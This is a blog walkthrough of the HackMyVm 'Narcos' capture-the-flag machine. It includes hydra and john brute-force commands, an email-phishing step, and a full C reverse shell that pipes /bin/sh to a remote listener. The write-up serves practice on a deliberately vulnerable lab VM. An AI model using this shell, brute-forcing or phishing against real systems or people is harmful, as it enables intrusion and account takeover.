Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Narcos Walkthrough

Another very interesting VM from HackMyVm; it can be downloaded here.


Scan the ports with Nmap.

On port 80 there is a static HTML page. Bruteforce the folders and files.

There is a SquirrelMail site, but we cannot log in yet.

After being stuck here for some time, we notice that the VM's boot screen has some hints.

Add "escobar.hmv" to /etc/hosts, and bruteforce the subdomains.

gobuster vhost -u http://escobar.hmv -w /apps/SecLists/Discovery/DNS/subdomains-top1million-110000.txt


We find another subdomain; add it to /etc/hosts too.

Opening the new address in the browser, we get a "File Browser" login panel.

We search the internet, find the project on GitHub, and in its documentation page we get the default credentials.

Of course, the password is not the default one. We need to bruteforce it with the username "admin". Use Burp Suite to capture the POST data of the login panel, send it to Repeater, and click "Send" once. Let's check the POST data and the response.

Now we know that the POST data is in JSON format and that the server responds to a failed login with "Forbidden". Then we use hydra to bruteforce. Take care that the colons inside the JSON body need to be escaped, because ":" is hydra's own field separator (thanks @ch4rm for the help).

hydra -l admin -P /usr/share/wordlists/rockyou.txt management.escobar.hmv http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^","recaptcha"\:""}:Forbidden' -t 64 -f


Soon we get the correct password.

Now we can log in to File Browser. There are two folders and one file.

In the folder "works" there is a logins.xlsx. The name is interesting, so we download it.

When we try to open it, it asks for a password.

We use john to brute force the password.

python2 /usr/share/john/office2john.py logins.xlsx > logins.hash
john --wordlist=/usr/share/wordlists/rockyou.txt logins.hash

Now we can open the xlsx file. There are four email accounts inside the document, three activated and one deactivated. There is one more subdomain address, "http://elcorreo.escobar.hmx", which we add to /etc/hosts, and a message that looks like some kind of hint.

Because gonzalo is the webadmin, we try to log in to SquirrelMail with his account, and succeed.

Here comes a trap. The SquirrelMail version is 1.4.23, and Google says it may have an RCE vulnerability. But after several tests, in the end I failed to get a reverse shell.

Then @ch4rm hinted that maybe I should consider email phishing. After checking each email's content, I decided to compose an email with the subject "new update release", with the secret code in the email body and a reverse shell in an attachment named "update". The email is sent to the other two accounts from the xlsx file.

The reverse shell code is downloaded from the internet and is written in C.

/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>      /* inet_addr(), htons(): missing in the original, needed to compile cleanly */
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"   /* listener IP, fill in before compiling */
#define REMOTE_PORT XXX                 /* listener port, fill in before compiling */
int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int s;
    /* Address of the listener to connect back to. */
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
    sa.sin_port = htons(REMOTE_PORT);
    /* Open a TCP socket and connect to the listener. */
    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    /* Point stdin, stdout and stderr at the socket. */
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);
    /* Replace this process with a shell whose I/O is the socket. */
    execve("/bin/sh", 0, 0);
    return 0;
}


Compile it.

After sending the email and waiting a few seconds, we get a reverse shell as user "carlos". Now we have the user flag.

There are three users in total in the home folder. After some enumeration, I found we can su to carlos and gonzalo with the passwords from the xlsx file, and the home folders of both accounts are readable. So the focus is on user pablo, whose home folder is unreadable for now.

If we su to pablo with the password from the xlsx file directly, we get a "no terminal" error.

We need to run the following two commands to set a TERM variable. The number of rows and columns depends on the size of your screen.

export TERM=xterm-256color
stty rows 120 columns 120

Then we run su pablo again and, wow, the screen fills with strange code like a computer virus infection.

After several seconds, we get this hint screen.

It looks like we need to decrypt the sr* code. The hint says VINEGAR. Let's google it.

Click the first site (it should be the most popular, because CTFers like it). After some failures, I read the hints again carefully. I think "aaaa-zzzz" means the alphabet set, and "pablo******" means the correct password starts with this string. That narrows down our decryption results. In the end, we can pick the right one out of more than 20 decrypted passwords.

We enter the "real" password and log in as pablo.

OK, now sudo -l: with these two real passwords we can do anything. Finally we are root.

Thanks for reading to the end. There is one more clue.

If you have tried the SquirrelMail RCE with the PoC code downloaded from the internet, you will fail to send emails.

In fact, this is because the RCE code changes the user's own email address. We need to change it back to the original correct one.
